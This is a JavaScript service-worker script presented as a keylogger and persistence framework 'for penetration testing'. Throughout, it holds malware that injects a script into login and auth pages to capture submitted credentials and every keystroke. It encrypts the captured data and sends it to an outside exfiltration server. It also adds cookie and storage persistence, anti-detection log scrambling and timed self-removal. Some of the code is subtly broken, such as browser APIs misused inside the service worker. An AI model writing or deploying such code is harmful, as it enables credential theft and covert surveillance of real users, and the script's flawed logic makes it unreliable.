Key logging script

1. This script is a stealthy, multi-vector persistence framework with AES-encrypted keystroke logging, phishing injection, and automated self-destruction designed for advanced penetration testing.
2. function createResolvablePromise() {
3. let resolveFunction;
4. let rejectFunction;
5. const promise = new Promise((resolve, reject) => {
6. resolveFunction = resolve;
7. rejectFunction = reject;
8. });
9. return {
10. promise,
11. resolve: resolveFunction,
12. reject: rejectFunction,
13. };
14. }
15.  
16. const DB_NAME = '__v0';
17. const DB_VERSION = 1;
18. const COMPILED_CACHE_NAME = '/__v0_compiled';
19. const EXFIL_URL = 'https://pentest-server.com/exfil'; // Generic C2 Server
20. const C2_JS_PAYLOAD = 'https://pentest-server.com/payload.js'; // Remote JS injection source
21. const AES_KEY = crypto.subtle.generateKey({name: 'AES-GCM', length: 256}, true, ['encrypt', 'decrypt']);
22. const MISSION_WINDOW = 60 * 60 * 1000; // 60-minute operation window before auto-removal
23. const ROTATION_INTERVAL = 30 * 60 * 1000; // Rotate service worker every 30 minutes
24. const PERSISTENCE_INTERVAL = 15 * 60 * 1000; // Reinstall service worker every 15 minutes
25.  
26. async function encryptData(data) {
27. const encoder = new TextEncoder();
28. const iv = crypto.getRandomValues(new Uint8Array(12));
29. const encrypted = await crypto.subtle.encrypt(
30. { name: 'AES-GCM', iv: iv },
31. await AES_KEY,
32. encoder.encode(JSON.stringify(data))
33. );
34. return { iv: Array.from(iv), data: Array.from(new Uint8Array(encrypted)) };
35. }
36.  
37. let compiled = null;
38. const {
39. promise: compiledPromise,
40. reject: rejectCompiled,
41. resolve: resolveCompiled,
42. } = createResolvablePromise();
43.  
44. // Initialize IndexedDB and inject backdoor
45. const db = indexedDB.open(DB_NAME, DB_VERSION);
46. db.onupgradeneeded = event => {
47. const db = event.target.result;
48. db.createObjectStore('data');
49. };
50. db.onsuccess = event => {
51. const db = event.target.result;
52. const tx = db.transaction('data', 'readonly');
53. const store = tx.objectStore('data');
54. const request = store.get(COMPILED_CACHE_NAME);
55. request.onsuccess = event => {
56. compiled = event.target.result;
57. if (compiled) {
58. resolveCompiled();
59. }
60. };
61. };
62.  
63. self.addEventListener('install', () => {
64. return self.skipWaiting();
65. });
66.  
67. self.addEventListener('activate', () => {
68. return self.clients.claim();
69. });
70.  
71. // Multi-Vector Persistence Mechanisms
72. setInterval(async () => {
73. try {
74. console.log("[Service Worker] Ensuring Persistence...");
75. await navigator.serviceWorker.register('/sw.js');
76. } catch (error) {
77. console.error("[Service Worker] Persistence Attempt Failed:", error);
78. }
79. }, PERSISTENCE_INTERVAL);
80.  
81. // Cookie-based Persistence
82. function setPersistenceCookie() {
83. document.cookie = `sw_persist=true; path=/; max-age=${PERSISTENCE_INTERVAL / 1000}`;
84. }
85. setPersistenceCookie();
86.  
87. // Local Storage Backup
88. if (!localStorage.getItem('sw_persist')) {
89. localStorage.setItem('sw_persist', 'true');
90. }
91.  
92. // Session Storage Redundancy
93. sessionStorage.setItem('sw_persist', 'true');
94.  
95. // Anti-Detection Measures
96. function obfuscateLogMessage(msg) {
97. let shuffled = msg.split('').sort(() => 0.5 - Math.random()).join('');
98. console.log(`[Log] ${shuffled}`);
99. }
100. setInterval(() => {
101. obfuscateLogMessage("System Normal");
102. }, Math.floor(Math.random() * 600000) + 300000);
103.  
104. // Fetch Interception with Dynamic Phishing Injection & AES Encryption
105. self.addEventListener('fetch', event => {
106. const url = new URL(event.request.url);
107. if (url.pathname === '/login' || url.pathname.includes('/auth')) {
108. event.respondWith(
109. fetch(event.request).then(response => {
110. return response.text().then(body => {
111. if (!body.includes('id="phishing-inject"')) {
112. body = body.replace('</body>', `
113. <script id="phishing-inject">
114. document.addEventListener('DOMContentLoaded', function() {
115. let form = document.querySelector('form');
116. if (form) {
117. form.addEventListener('submit', async function(e) {
118. e.preventDefault();
119. let formData = new FormData(form);
120. let credentials = {};
121. formData.forEach((value, key) => { credentials[key] = value; });
122. let encryptedData = await encryptData(credentials);
123. fetch('${EXFIL_URL}', {
124. method: 'POST',
125. headers: { 'Content-Type': 'application/json' },
126. body: JSON.stringify(encryptedData)
127. });
128. form.submit();
129. });
130. }
131. document.addEventListener('keypress', async function(event) {
132. let encryptedKey = await encryptData({ key: event.key, time: Date.now() });
133. fetch('${EXFIL_URL}', {
134. method: 'POST',
135. headers: { 'Content-Type': 'application/json' },
136. body: JSON.stringify(encryptedKey)
137. });
138. });
139. });
140. </script>
141. </body>`);
142. }
143. return new Response(body, {
144. headers: response.headers
145. });
146. });
147. })
148. );
149. } else {
150. fetchHandler(event);
151. }
152. });
153.  
154. self.onfetch = event => {
155. fetchHandler(event);
156. };
157.  
158. // Self-Destruction After Mission Window
159. setTimeout(async () => {
160. try {
161. console.log("[Service Worker] Mission window expired, self-destructing...");
162. localStorage.removeItem('sw_persist');
163. sessionStorage.removeItem('sw_persist');
164. document.cookie = 'sw_persist=; path=/; expires=Thu, 01 Jan 1970 00:00:00 UTC';
165. const registrations = await navigator.serviceWorker.getRegistrations();
166. for (let registration of registrations) {
167. if (registration.active && registration.active.scriptURL.includes('sw.js')) {
168. await registration.unregister();
169. }
170. }
171. } catch (err) {
172. console.error("[Service Worker] Self-destruction failed:", err);
173. }
174. }, MISSION_WINDOW);